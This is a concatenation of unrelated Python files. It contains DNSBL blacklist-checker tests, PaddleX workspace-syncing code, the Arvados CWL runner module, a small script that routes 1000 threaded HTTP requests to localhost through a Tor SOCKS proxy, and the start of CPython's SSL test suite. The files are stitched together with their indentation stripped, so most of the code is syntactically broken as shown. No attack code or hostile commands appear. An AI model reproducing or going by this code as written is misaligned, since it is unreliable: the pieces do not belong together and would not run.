checker = DNSBLIpChecker()
res = checker.check('8.8.8.8')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
def test_wrong_ip_format():
misformated_ips = ['abc', '8.8.8.256']
for ip in misformated_ips:
checker = DNSBLIpChecker()
with pytest.raises(ValueError):
checker.check(ip)
# DOMAIN TESTS
def test_domain_checker():
checker = DNSBLDomainChecker()
malicious_domain = 'dbltest.com'
res = checker.check(malicious_domain)
assert res.blacklisted
assert res.categories
assert res.detected_by
results = checker.bulk_check([malicious_domain, 'google.com'])
# check bulk check
assert results[0].detected_by == res.detected_by
assert not results[1].blacklisted
def test_domain_providers():
""" Domain Providers should not mark google.com as bad """
checker = DNSBLDomainChecker()
res = checker.check('google.com')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
def test_wrong_domain_format():
misformated_ips = ['abc-', '8.8.8.256', 'bababa']
for ip in misformated_ips:
checker = DNSBLDomainChecker()
with pytest.raises(ValueError):
print(checker.check(ip))
def test_domain_variants():
    # capitalized / 3rd+ level domains, IDNA
capitalized_domains = ['Google.com', 'дом.рф', 'www.digital.govt.nz']
for domain in capitalized_domains:
checker = DNSBLDomainChecker()
res = checker.check(domain)
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
# Threading tests
def test_main_thread():
result = None
def test():
nonlocal result
checker = DNSBLIpChecker()
result = checker.check('68.128.212.240')
thr = threading.Thread(target=test)
thr.start()
thr.join()
assert result.blacklisted
## COMPAT TESTS
def test_checker_compat_0_6():
checker = DNSBLChecker()
res = checker.check_ip('68.128.212.240')
assert res.blacklisted
assert res.categories
assert res.detected_by
results = checker.check_ips(['68.128.212.240', '8.8.8.8'])
# check bulk check
assert results[0].detected_by == res.detected_by
assert not results[1].blacklisted
def test_providers_compat_0_6():
""" Providers should not mark google ip as bad """
checker = DNSBLChecker()
res = checker.check_ip('8.8.8.8')
assert not res.blacklisted
assert not res.categories
assert not res.detected_by
assert not res.failed_providers
def test_wrong_ip_format_compat_0_6():
misformated_ips = ['abc', '8.8.8.256']
for ip in misformated_ips:
checker = DNSBLChecker()
with pytest.raises(ValueError):
checker.check_ip(ip)
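# Hedged run sketch (assumption: pytest and the package providing .checker/.providers
# are installed; these tests perform real DNS lookups against public DNSBL providers):
#
#   python -m pytest path/to/tests.py -k "checker or domain"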
|
workspace.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import workspace_pb2 as w
from .utils import get_logger
from .dir import *
import os
import os.path as osp
from threading import Thread
import traceback
import platform
import configparser
import time
import shutil
import copy
class Workspace():
def __init__(self, workspace, dirname, logger):
self.workspace = workspace
#self.machine_info = {}
# app init
self.init_app_resource(dirname)
        # current workspace version
self.current_version = "0.2.0"
self.logger = logger
        # set the download/storage path for PaddleX pretrained models;
        # once the path is set, the same model will not be downloaded again
self.load_workspace()
self.stop_running = False
self.sync_thread = self.sync_with_local(interval=2)
        # check the hardware environment
#self.check_hardware_env()
def init_app_resource(self, dirname):
self.m_cfgfile = configparser.ConfigParser()
app_conf_file_name = "PaddleX".lower() + ".cfg"
paddlex_cfg_file = os.path.join(PADDLEX_HOME, app_conf_file_name)
try:
self.m_cfgfile.read(paddlex_cfg_file)
except Exception as e:
print("[ERROR] Fail to read {}".format(paddlex_cfg_file))
if not self.m_cfgfile.has_option("USERCFG", "workspacedir"):
self.m_cfgfile.add_section("USERCFG")
self.m_cfgfile.set("USERCFG", "workspacedir", "")
self.m_cfgfile["USERCFG"]["workspacedir"] = dirname
def load_workspace(self):
path = self.workspace.path
newest_file = osp.join(self.workspace.path, 'workspace.newest.pb')
bak_file = osp.join(self.workspace.path, 'workspace.bak.pb')
flag_file = osp.join(self.workspace.path, '.pb.success')
self.workspace.version = self.current_version
try:
if osp.exists(flag_file):
with open(newest_file, 'rb') as f:
self.workspace.ParseFromString(f.read())
elif osp.exists(bak_file):
with open(bak_file, 'rb') as f:
self.workspace.ParseFromString(f.read())
else:
print("it is a new workspace")
except Exception as e:
print(traceback.format_exc())
self.workspace.path = path
if self.workspace.version < "0.2.0":
self.update_workspace()
self.recover_workspace()
def update_workspace(self):
if len(self.workspace.projects) == 0 and len(
self.workspace.datasets) == 0:
            self.workspace.version = '0.2.0'
return
for key in self.workspace.datasets:
ds = self.workspace.datasets[key]
try:
info_file = os.path.join(ds.path, 'info.pb')
with open(info_file, 'wb') as f:
f.write(ds.SerializeToString())
except Exception as e:
self.logger.info(traceback.format_exc())
for key in self.workspace.projects:
pj = self.workspace.projects[key]
try:
info_file = os.path.join(pj.path, 'info.pb')
with open(info_file, 'wb') as f:
f.write(pj.SerializeToString())
except Exception as e:
self.logger.info(traceback.format_exc())
for key in self.workspace.tasks:
task = self.workspace.tasks[key]
try:
info_file = os.path.join(task.path, 'info.pb')
with open(info_file, 'wb') as f:
f.write(task.SerializeToString())
except Exception as e:
self.logger.info(traceback.format_exc())
        self.workspace.version = '0.2.0'
def recover_workspace(self):
if len(self.workspace.projects) > 0 or len(
self.workspace.datasets) > 0:
return
projects_dir = os.path.join(self.workspace.path, 'projects')
datasets_dir = os.path.join(self.workspace.path, 'datasets')
if not os.path.exists(projects_dir):
os.makedirs(projects_dir)
if not os.path.exists(datasets_dir):
os.makedirs(datasets_dir)
max_project_id = 0
max_dataset_id = 0
max_task_id = 0
for pd in os.listdir(projects_dir):
try:
if pd[0] != 'P':
continue
if int(pd[1:]) > max_project_id:
max_project_id = int(pd[1:])
except:
continue
info_pb_file = os.path.join(projects_dir, pd, 'info.pb')
if not os.path.exists(info_pb_file):
continue
try:
pj = w.Project()
with open(info_pb_file, 'rb') as f:
pj.ParseFromString(f.read())
self.workspace.projects[pd].CopyFrom(pj)
except Exception as e:
self.logger.info(traceback.format_exc())
for td in os.listdir(os.path.join(projects_dir, pd)):
try:
if td[0] != 'T':
continue
if int(td[1:]) > max_task_id:
max_task_id = int(td[1:])
except:
continue
info_pb_file = os.path.join(projects_dir, pd, td, 'info.pb')
if not os.path.exists(info_pb_file):
continue
try:
task = w.Task()
with open(info_pb_file, 'rb') as f:
task.ParseFromString(f.read())
self.workspace.tasks[td].CopyFrom(task)
except Exception as e:
self.logger.info(traceback.format_exc())
for dd in os.listdir(datasets_dir):
try:
if dd[0] != 'D':
continue
if int(dd[1:]) > max_dataset_id:
max_dataset_id = int(dd[1:])
except:
continue
info_pb_file = os.path.join(datasets_dir, dd, 'info.pb')
if not os.path.exists(info_pb_file):
continue
try:
ds = w.Dataset()
with open(info_pb_file, 'rb') as f:
ds.ParseFromString(f.read())
self.workspace.datasets[dd].CopyFrom(ds)
except Exception as e:
self.logger.info(traceback.format_exc())
self.workspace.max_dataset_id = max_dataset_id
self.workspace.max_project_id = max_project_id
self.workspace.max_task_id = max_task_id
    # every `interval` seconds, sync the workspace to local files
def sync_with_local(self, interval=2):
def sync_func(s, interval_seconds=2):
newest_file = osp.join(self.workspace.path, 'workspace.newest.pb')
stable_file = osp.join(self.workspace.path, 'workspace.stable.pb')
bak_file = osp.join(self.workspace.path, 'workspace.bak.pb')
flag_file = osp.join(self.workspace.path, '.pb.success')
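            # Crash-safety scheme: drop the .pb.success flag, rewrite newest.pb, then
            # recreate the flag; the previous stable.pb is rotated to bak.pb, which
            # load_workspace() above falls back on when the flag file is missing.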
while True:
current_time = time.time()
time_array = time.localtime(current_time)
current_time = time.strftime("%Y-%m-%d %H:%M:%S", time_array)
self.workspace.current_time = current_time
if osp.exists(flag_file):
os.remove(flag_file)
f = open(newest_file, mode='wb')
f.write(s.workspace.SerializeToString())
f.close()
open(flag_file, 'w').close()
if osp.exists(stable_file):
shutil.copyfile(stable_file, bak_file)
shutil.copyfile(newest_file, stable_file)
if s.stop_running:
break
time.sleep(interval_seconds)
t = Thread(target=sync_func, args=(self, interval))
t.start()
return t
def check_hardware_env(self):
        # check whether a GPU is available and whether the CPU settings are configured
hasGpu = True
try:
'''data = {'path' : path}
from .system import get_machine_info
info = get_machine_info(data, self.machine_info)['info']
if info is None:
return
if (info['gpu_num'] == 0 and self.sysstr == "Windows"):
data['path'] = os.path.abspath(os.path.dirname(__file__))
info = get_machine_info(data, self.machine_info)['info']'''
from .system import get_system_info
info = get_system_info()['info']
hasGpu = (info['gpu_num'] > 0)
self.machine_info = info
#driver_ver = info['driver_version']
# driver_ver_list = driver_ver.split(".")
# major_ver, minor_ver = driver_ver_list[0:2]
# if sysstr == "Windows":
# if int(major_ver) < 411 or \
# (int(major_ver) == 411 and int(minor_ver) < 31):
# raise Exception("The GPU dirver version should be larger than 411.31")
#
# elif sysstr == "Linux":
# if int(major_ver) < 410 or \
# (int(major_ver) == 410 and int(minor_ver) < 48):
# raise Exception("The GPU dirver version should be larger than 410.48")
except Exception as e:
hasGpu = False
self.m_HasGpu = hasGpu
self.save_app_cfg_file()
def save_app_cfg_file(self):
        # update the application configuration file
app_conf_file_name = 'PaddleX'.lower() + ".cfg"
with open(os.path.join(PADDLEX_HOME, app_conf_file_name),
'w+') as file:
self.m_cfgfile.write(file)
def init_workspace(workspace, dirname, logger):
wp = Workspace(workspace, dirname, logger)
#if not machine_info:
#machine_info.update(wp.machine_info)
return {'status': 1}
def set_attr(data, workspace):
"""对workspace中项目,数据,任务变量进行修改赋值
Args:
data为dict,key包括
'struct'结构类型,可以是'dataset', 'project'或'task';
'id'查询id, 其余的key:value则分别为待修改的变量名和相应的修改值。
"""
struct = data['struct']
id = data['id']
    assert struct in ['dataset', 'project', 'task'], "struct must be one of dataset, project or task"
if struct == 'dataset':
        assert id in workspace.datasets, "dataset ID '{}' does not exist".format(id)
modify_struct = workspace.datasets[id]
elif struct == 'project':
        assert id in workspace.projects, "project ID '{}' does not exist".format(id)
modify_struct = workspace.projects[id]
elif struct == 'task':
        assert id in workspace.tasks, "task ID '{}' does not exist".format(id)
modify_struct = workspace.tasks[id]
'''for k, v in data.items():
if k in ['id', 'struct']:
continue
assert hasattr(modify_struct,
k), "{}不存在成员变量'{}'".format(type(modify_struct), k)
setattr(modify_struct, k, v)'''
for k, v in data['attr_dict'].items():
assert hasattr(modify_struct,
k), "{}不存在成员变量'{}'".format(type(modify_struct), k)
setattr(modify_struct, k, v)
with open(os.path.join(modify_struct.path, 'info.pb'), 'wb') as f:
f.write(modify_struct.SerializeToString())
return {'status': 1}
def get_attr(data, workspace):
"""取出workspace中项目,数据,任务变量值
Args:
data为dict,key包括
'struct'结构类型,可以是'dataset', 'project'或'task';
'id'查询id, 'attr_list'需要获取的属性值列表
"""
struct = data['struct']
id = data['id']
    assert struct in ['dataset', 'project', 'task'], "struct must be one of dataset, project or task"
if struct == 'dataset':
        assert id in workspace.datasets, "dataset ID '{}' does not exist".format(id)
modify_struct = workspace.datasets[id]
elif struct == 'project':
        assert id in workspace.projects, "project ID '{}' does not exist".format(id)
modify_struct = workspace.projects[id]
elif struct == 'task':
        assert id in workspace.tasks, "task ID '{}' does not exist".format(id)
modify_struct = workspace.tasks[id]
attr = {}
for k in data['attr_list']:
if k in ['id', 'struct']:
continue
assert hasattr(modify_struct,
k), "{}不存在成员变量'{}'".format(type(modify_struct), k)
v = getattr(modify_struct, k)
attr[k] = v
return {'status': 1, 'attr': attr}
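# Hedged usage sketch of set_attr/get_attr (assumptions: `workspace` is the same
# protobuf workspace object used above; 'P0001' and the 'name'/'path' fields are
# hypothetical). Defined but never called, so importing this module is unaffected.
def _example_set_and_get_attr(workspace):
    # rename a hypothetical project, then read two of its fields back
    set_attr({'struct': 'project', 'id': 'P0001',
              'attr_dict': {'name': 'demo-project'}}, workspace)
    return get_attr({'struct': 'project', 'id': 'P0001',
                     'attr_list': ['name', 'path']}, workspace)['attr']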
|
__init__.py
|
#!/usr/bin/env python
# Implement cwl-runner interface for submitting and running work on Arvados, using
# either the Crunch jobs API or Crunch containers API.
import argparse
import logging
import os
import sys
import threading
import hashlib
import copy
import json
from functools import partial
import pkg_resources # part of setuptools
from cwltool.errors import WorkflowException
import cwltool.main
import cwltool.workflow
import schema_salad
import arvados
import arvados.config
from .arvcontainer import ArvadosContainer, RunnerContainer
from .arvjob import ArvadosJob, RunnerJob, RunnerTemplate
from .runner import Runner, upload_instance
from .arvtool import ArvadosCommandTool
from .arvworkflow import ArvadosWorkflow, upload_workflow
from .fsaccess import CollectionFsAccess
from .perf import Perf
from .pathmapper import FinalOutputPathMapper
from ._version import __version__
from cwltool.pack import pack
from cwltool.process import shortname, UnsupportedRequirement, getListing
from cwltool.pathmapper import adjustFileObjs, adjustDirObjs
from cwltool.draft2tool import compute_checksums
from arvados.api import OrderedJsonModel
logger = logging.getLogger('arvados.cwl-runner')
metrics = logging.getLogger('arvados.cwl-runner.metrics')
logger.setLevel(logging.INFO)
class ArvCwlRunner(object):
"""Execute a CWL tool or workflow, submit work (using either jobs or
containers API), wait for them to complete, and report output.
"""
def __init__(self, api_client, work_api=None, keep_client=None, output_name=None):
self.api = api_client
self.processes = {}
self.lock = threading.Lock()
self.cond = threading.Condition(self.lock)
self.final_output = None
self.final_status = None
self.uploaded = {}
self.num_retries = 4
self.uuid = None
self.stop_polling = threading.Event()
self.poll_api = None
self.pipeline = None
self.final_output_collection = None
self.output_name = output_name
self.project_uuid = None
if keep_client is not None:
self.keep_client = keep_client
else:
self.keep_client = arvados.keep.KeepClient(api_client=self.api, num_retries=self.num_retries)
for api in ["jobs", "containers"]:
try:
methods = self.api._rootDesc.get('resources')[api]['methods']
if ('httpMethod' in methods['create'] and
(work_api == api or work_api is None)):
self.work_api = api
break
except KeyError:
pass
if not self.work_api:
if work_api is None:
raise Exception("No supported APIs")
else:
raise Exception("Unsupported API '%s'" % work_api)
def arv_make_tool(self, toolpath_object, **kwargs):
kwargs["work_api"] = self.work_api
if "class" in toolpath_object and toolpath_object["class"] == "CommandLineTool":
return ArvadosCommandTool(self, toolpath_object, **kwargs)
elif "class" in toolpath_object and toolpath_object["class"] == "Workflow":
return ArvadosWorkflow(self, toolpath_object, **kwargs)
else:
return cwltool.workflow.defaultMakeTool(toolpath_object, **kwargs)
def output_callback(self, out, processStatus):
if processStatus == "success":
logger.info("Overall process status is %s", processStatus)
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Complete"}).execute(num_retries=self.num_retries)
else:
logger.warn("Overall process status is %s", processStatus)
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Failed"}).execute(num_retries=self.num_retries)
self.final_status = processStatus
self.final_output = out
def on_message(self, event):
if "object_uuid" in event:
if event["object_uuid"] in self.processes and event["event_type"] == "update":
if event["properties"]["new_attributes"]["state"] == "Running" and self.processes[event["object_uuid"]].running is False:
uuid = event["object_uuid"]
with self.lock:
j = self.processes[uuid]
logger.info("Job %s (%s) is Running", j.name, uuid)
j.running = True
j.update_pipeline_component(event["properties"]["new_attributes"])
elif event["properties"]["new_attributes"]["state"] in ("Complete", "Failed", "Cancelled"):
uuid = event["object_uuid"]
try:
self.cond.acquire()
j = self.processes[uuid]
logger.info("Job %s (%s) is %s", j.name, uuid, event["properties"]["new_attributes"]["state"])
with Perf(metrics, "done %s" % j.name):
j.done(event["properties"]["new_attributes"])
self.cond.notify()
finally:
self.cond.release()
def poll_states(self):
"""Poll status of jobs or containers listed in the processes dict.
Runs in a separate thread.
"""
while True:
self.stop_polling.wait(15)
if self.stop_polling.is_set():
break
with self.lock:
keys = self.processes.keys()
if not keys:
continue
if self.work_api == "containers":
table = self.poll_api.containers()
elif self.work_api == "jobs":
table = self.poll_api.jobs()
try:
proc_states = table.list(filters=[["uuid", "in", keys]]).execute(num_retries=self.num_retries)
except Exception as e:
logger.warn("Error checking states on API server: %s", e)
continue
for p in proc_states["items"]:
self.on_message({
"object_uuid": p["uuid"],
"event_type": "update",
"properties": {
"new_attributes": p
}
})
def get_uploaded(self):
return self.uploaded.copy()
def add_uploaded(self, src, pair):
self.uploaded[src] = pair
def check_writable(self, obj):
if isinstance(obj, dict):
if obj.get("writable"):
raise UnsupportedRequirement("InitialWorkDir feature 'writable: true' not supported")
for v in obj.itervalues():
self.check_writable(v)
if isinstance(obj, list):
for v in obj:
self.check_writable(v)
def make_output_collection(self, name, outputObj):
outputObj = copy.deepcopy(outputObj)
files = []
def capture(fileobj):
files.append(fileobj)
adjustDirObjs(outputObj, capture)
adjustFileObjs(outputObj, capture)
generatemapper = FinalOutputPathMapper(files, "", "", separateDirs=False)
final = arvados.collection.Collection(api_client=self.api,
keep_client=self.keep_client,
num_retries=self.num_retries)
srccollections = {}
for k,v in generatemapper.items():
sp = k.split("/")
srccollection = sp[0][5:]
if srccollection not in srccollections:
srccollections[srccollection] = arvados.collection.CollectionReader(
srccollection,
api_client=self.api,
keep_client=self.keep_client,
num_retries=self.num_retries)
reader = srccollections[srccollection]
try:
srcpath = "/".join(sp[1:]) if len(sp) > 1 else "."
final.copy(srcpath, v.target, source_collection=reader, overwrite=False)
except IOError as e:
logger.warn("While preparing output collection: %s", e)
def rewrite(fileobj):
fileobj["location"] = generatemapper.mapper(fileobj["location"]).target
for k in ("basename", "size", "listing"):
if k in fileobj:
del fileobj[k]
adjustDirObjs(outputObj, rewrite)
adjustFileObjs(outputObj, rewrite)
with final.open("cwl.output.json", "w") as f:
json.dump(outputObj, f, sort_keys=True, indent=4, separators=(',',': '))
final.save_new(name=name, owner_uuid=self.project_uuid, ensure_unique_name=True)
logger.info("Final output collection %s \"%s\" (%s)", final.portable_data_hash(),
final.api_response()["name"],
final.manifest_locator())
self.final_output_collection = final
def arv_executor(self, tool, job_order, **kwargs):
self.debug = kwargs.get("debug")
tool.visit(self.check_writable)
useruuid = self.api.users().current().execute()["uuid"]
self.project_uuid = kwargs.get("project_uuid") if kwargs.get("project_uuid") else useruuid
self.pipeline = None
make_fs_access = kwargs.get("make_fs_access") or partial(CollectionFsAccess,
api_client=self.api,
keep_client=self.keep_client)
self.fs_access = make_fs_access(kwargs["basedir"])
if kwargs.get("create_template"):
tmpl = RunnerTemplate(self, tool, job_order, kwargs.get("enable_reuse"))
tmpl.save()
# cwltool.main will write our return value to stdout.
return tmpl.uuid
if kwargs.get("create_workflow") or kwargs.get("update_workflow"):
return upload_workflow(self, tool, job_order, self.project_uuid, kwargs.get("update_workflow"))
self.ignore_docker_for_reuse = kwargs.get("ignore_docker_for_reuse")
kwargs["make_fs_access"] = make_fs_access
kwargs["enable_reuse"] = kwargs.get("enable_reuse")
kwargs["use_container"] = True
kwargs["tmpdir_prefix"] = "tmp"
kwargs["on_error"] = "continue"
kwargs["compute_checksum"] = kwargs.get("compute_checksum")
if self.work_api == "containers":
kwargs["outdir"] = "/var/spool/cwl"
kwargs["docker_outdir"] = "/var/spool/cwl"
kwargs["tmpdir"] = "/tmp"
kwargs["docker_tmpdir"] = "/tmp"
elif self.work_api == "jobs":
kwargs["outdir"] = "$(task.outdir)"
kwargs["docker_outdir"] = "$(task.outdir)"
kwargs["tmpdir"] = "$(task.tmpdir)"
upload_instance(self, shortname(tool.tool["id"]), tool, job_order)
runnerjob = None
if kwargs.get("submit"):
if self.work_api == "containers":
if tool.tool["class"] == "CommandLineTool":
runnerjob = tool.job(job_order,
self.output_callback,
**kwargs).next()
else:
runnerjob = RunnerContainer(self, tool, job_order, kwargs.get("enable_reuse"), self.output_name)
else:
runnerjob = RunnerJob(self, tool, job_order, kwargs.get("enable_reuse"), self.output_name)
if not kwargs.get("submit") and "cwl_runner_job" not in kwargs and not self.work_api == "containers":
# Create pipeline for local run
self.pipeline = self.api.pipeline_instances().create(
body={
"owner_uuid": self.project_uuid,
"name": shortname(tool.tool["id"]),
"components": {},
"state": "RunningOnClient"}).execute(num_retries=self.num_retries)
logger.info("Pipeline instance %s", self.pipeline["uuid"])
if runnerjob and not kwargs.get("wait"):
runnerjob.run(wait=kwargs.get("wait"))
return runnerjob.uuid
self.poll_api = arvados.api('v1')
self.polling_thread = threading.Thread(target=self.poll_states)
self.polling_thread.start()
if runnerjob:
jobiter = iter((runnerjob,))
else:
if "cwl_runner_job" in kwargs:
self.uuid = kwargs.get("cwl_runner_job").get('uuid')
jobiter = tool.job(job_order,
self.output_callback,
**kwargs)
try:
self.cond.acquire()
# Will continue to hold the lock for the duration of this code
# except when in cond.wait(), at which point on_message can update
# job state and process output callbacks.
loopperf = Perf(metrics, "jobiter")
loopperf.__enter__()
for runnable in jobiter:
loopperf.__exit__()
if runnable:
with Perf(metrics, "run"):
runnable.run(**kwargs)
else:
if self.processes:
self.cond.wait(1)
else:
logger.error("Workflow is deadlocked, no runnable jobs and not waiting on any pending jobs.")
break
loopperf.__enter__()
loopperf.__exit__()
while self.processes:
self.cond.wait(1)
except UnsupportedRequirement:
raise
except:
if sys.exc_info()[0] is KeyboardInterrupt:
logger.error("Interrupted, marking pipeline as failed")
else:
logger.error("Caught unhandled exception, marking pipeline as failed. Error was: %s", sys.exc_info()[1], exc_info=(sys.exc_info()[1] if self.debug else False))
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": "Failed"}).execute(num_retries=self.num_retries)
if runnerjob and runnerjob.uuid and self.work_api == "containers":
self.api.container_requests().update(uuid=runnerjob.uuid,
body={"priority": "0"}).execute(num_retries=self.num_retries)
finally:
self.cond.release()
self.stop_polling.set()
self.polling_thread.join()
if self.final_status == "UnsupportedRequirement":
raise UnsupportedRequirement("Check log for details.")
if self.final_status != "success":
raise WorkflowException("Workflow failed.")
if self.final_output is None:
raise WorkflowException("Workflow did not return a result.")
if kwargs.get("submit") and isinstance(runnerjob, Runner):
logger.info("Final output collection %s", runnerjob.final_output)
else:
if self.output_name is None:
self.output_name = "Output of %s" % (shortname(tool.tool["id"]))
self.make_output_collection(self.output_name, self.final_output)
if kwargs.get("compute_checksum"):
adjustDirObjs(self.final_output, partial(getListing, self.fs_access))
adjustFileObjs(self.final_output, partial(compute_checksums, self.fs_access))
return self.final_output
def versionstring():
"""Print version string of key packages for provenance and debugging."""
arvcwlpkg = pkg_resources.require("arvados-cwl-runner")
arvpkg = pkg_resources.require("arvados-python-client")
cwlpkg = pkg_resources.require("cwltool")
return "%s %s %s, %s %s, %s %s" % (sys.argv[0], __version__, arvcwlpkg[0].version,
"arvados-python-client", arvpkg[0].version,
"cwltool", cwlpkg[0].version)
def arg_parser(): # type: () -> argparse.ArgumentParser
parser = argparse.ArgumentParser(description='Arvados executor for Common Workflow Language')
parser.add_argument("--basedir", type=str,
help="Base directory used to resolve relative references in the input, default to directory of input object file or current directory (if inputs piped/provided on command line).")
parser.add_argument("--outdir", type=str, default=os.path.abspath('.'),
help="Output directory, default current directory")
parser.add_argument("--eval-timeout",
help="Time to wait for a Javascript expression to evaluate before giving an error, default 20s.",
type=float,
default=20)
parser.add_argument("--version", action="store_true", help="Print version and exit")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--verbose", action="store_true", help="Default logging")
exgroup.add_argument("--quiet", action="store_true", help="Only print warnings and errors.")
exgroup.add_argument("--debug", action="store_true", help="Print even more logging")
parser.add_argument("--metrics", action="store_true", help="Print timing metrics")
parser.add_argument("--tool-help", action="store_true", help="Print command line help for tool")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--enable-reuse", action="store_true",
default=True, dest="enable_reuse",
help="")
exgroup.add_argument("--disable-reuse", action="store_false",
default=True, dest="enable_reuse",
help="")
parser.add_argument("--project-uuid", type=str, metavar="UUID", help="Project that will own the workflow jobs, if not provided, will go to home project.")
parser.add_argument("--output-name", type=str, help="Name to use for collection that stores the final output.", default=None)
parser.add_argument("--ignore-docker-for-reuse", action="store_true",
help="Ignore Docker image version when deciding whether to reuse past jobs.",
default=False)
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--submit", action="store_true", help="Submit workflow to run on Arvados.",
default=True, dest="submit")
exgroup.add_argument("--local", action="store_false", help="Run workflow on local host (submits jobs to Arvados).",
default=True, dest="submit")
exgroup.add_argument("--create-template", action="store_true", help="Create an Arvados pipeline template.")
exgroup.add_argument("--create-workflow", action="store_true", help="Create an Arvados workflow.")
exgroup.add_argument("--update-workflow", type=str, metavar="UUID", help="Update existing Arvados workflow with uuid.")
exgroup = parser.add_mutually_exclusive_group()
exgroup.add_argument("--wait", action="store_true", help="After submitting workflow runner job, wait for completion.",
default=True, dest="wait")
exgroup.add_argument("--no-wait", action="store_false", help="Submit workflow runner job and exit.",
default=True, dest="wait")
parser.add_argument("--api", type=str,
default=None, dest="work_api",
help="Select work submission API, one of 'jobs' or 'containers'.")
parser.add_argument("--compute-checksum", action="store_true", default=False,
help="Compute checksum of contents while collecting outputs",
dest="compute_checksum")
parser.add_argument("workflow", type=str, nargs="?", default=None, help="The workflow to execute")
parser.add_argument("job_order", nargs=argparse.REMAINDER, help="The input object to the workflow.")
return parser
def add_arv_hints():
cache = {}
res = pkg_resources.resource_stream(__name__, 'arv-cwl-schema.yml')
cache["http://arvados.org/cwl"] = res.read()
res.close()
document_loader, cwlnames, _, _ = cwltool.process.get_schema("v1.0")
_, extnames, _, _ = schema_salad.schema.load_schema("http://arvados.org/cwl", cache=cache)
for n in extnames.names:
if not cwlnames.has_name("http://arvados.org/cwl#"+n, ""):
cwlnames.add_name("http://arvados.org/cwl#"+n, "", extnames.get_name(n, ""))
document_loader.idx["http://arvados.org/cwl#"+n] = {}
def main(args, stdout, stderr, api_client=None, keep_client=None):
parser = arg_parser()
job_order_object = None
arvargs = parser.parse_args(args)
if (arvargs.create_template or arvargs.create_workflow or arvargs.update_workflow) and not arvargs.job_order:
job_order_object = ({}, "")
add_arv_hints()
try:
if api_client is None:
api_client=arvados.api('v1', model=OrderedJsonModel())
runner = ArvCwlRunner(api_client, work_api=arvargs.work_api, keep_client=keep_client, output_name=arvargs.output_name)
except Exception as e:
logger.error(e)
return 1
if arvargs.debug:
logger.setLevel(logging.DEBUG)
if arvargs.quiet:
logger.setLevel(logging.WARN)
logging.getLogger('arvados.arv-run').setLevel(logging.WARN)
if arvargs.metrics:
metrics.setLevel(logging.DEBUG)
logging.getLogger("cwltool.metrics").setLevel(logging.DEBUG)
arvargs.conformance_test = None
arvargs.use_container = True
return cwltool.main.main(args=arvargs,
stdout=stdout,
stderr=stderr,
executor=runner.arv_executor,
makeTool=runner.arv_make_tool,
versionfunc=versionstring,
job_order_object=job_order_object,
make_fs_access=partial(CollectionFsAccess, api_client=api_client))
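# Minimal entry-point sketch, assuming this module may be run directly rather than
# through a packaged console script; it simply forwards to main() defined above.
if __name__ == "__main__":
    sys.exit(main(sys.argv[1:], sys.stdout, sys.stderr))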
|
proxy_usage.py
|
import socket
import socks
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
socket.socket = socks.socksocket
# from tornado import ioloop, httpclient
from urllib.request import Request, urlopen
# req = Request('http://127.0.0.1:8000',
# headers={
# 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0'
# })
# print(urlopen(req).read())
from urllib.parse import urlparse
from threading import Thread
import sys
from queue import Queue
import http
concurrent = 1000
i = 0
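# Worker/queue pattern: `concurrent` daemon threads pull URLs from the queue `q`
# (created below), check the status with a HEAD request, then fetch the body; all
# traffic goes through the SOCKS5 proxy configured above via the socket monkey-patch.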
def doWork():
while True:
url = q.get()
status, url = getStatus(url)
doSomethingWithResult(status, url)
q.task_done()
def getStatus(ourl):
try:
url = urlparse(ourl)
conn = http.client.HTTPConnection(url.netloc)
conn.request("HEAD", url.path)
res = conn.getresponse()
return res.status, ourl
except:
return "error", ourl
def doSomethingWithResult(status, url):
req = Request(url,
headers={
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0'
})
with urlopen(req) as response:
response.read()
print(url.split('?')[-1])
pass
q = Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for i in range(100):
q.put('http://127.0.0.1:8000')
q.join()
except KeyboardInterrupt:
sys.exit(1)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
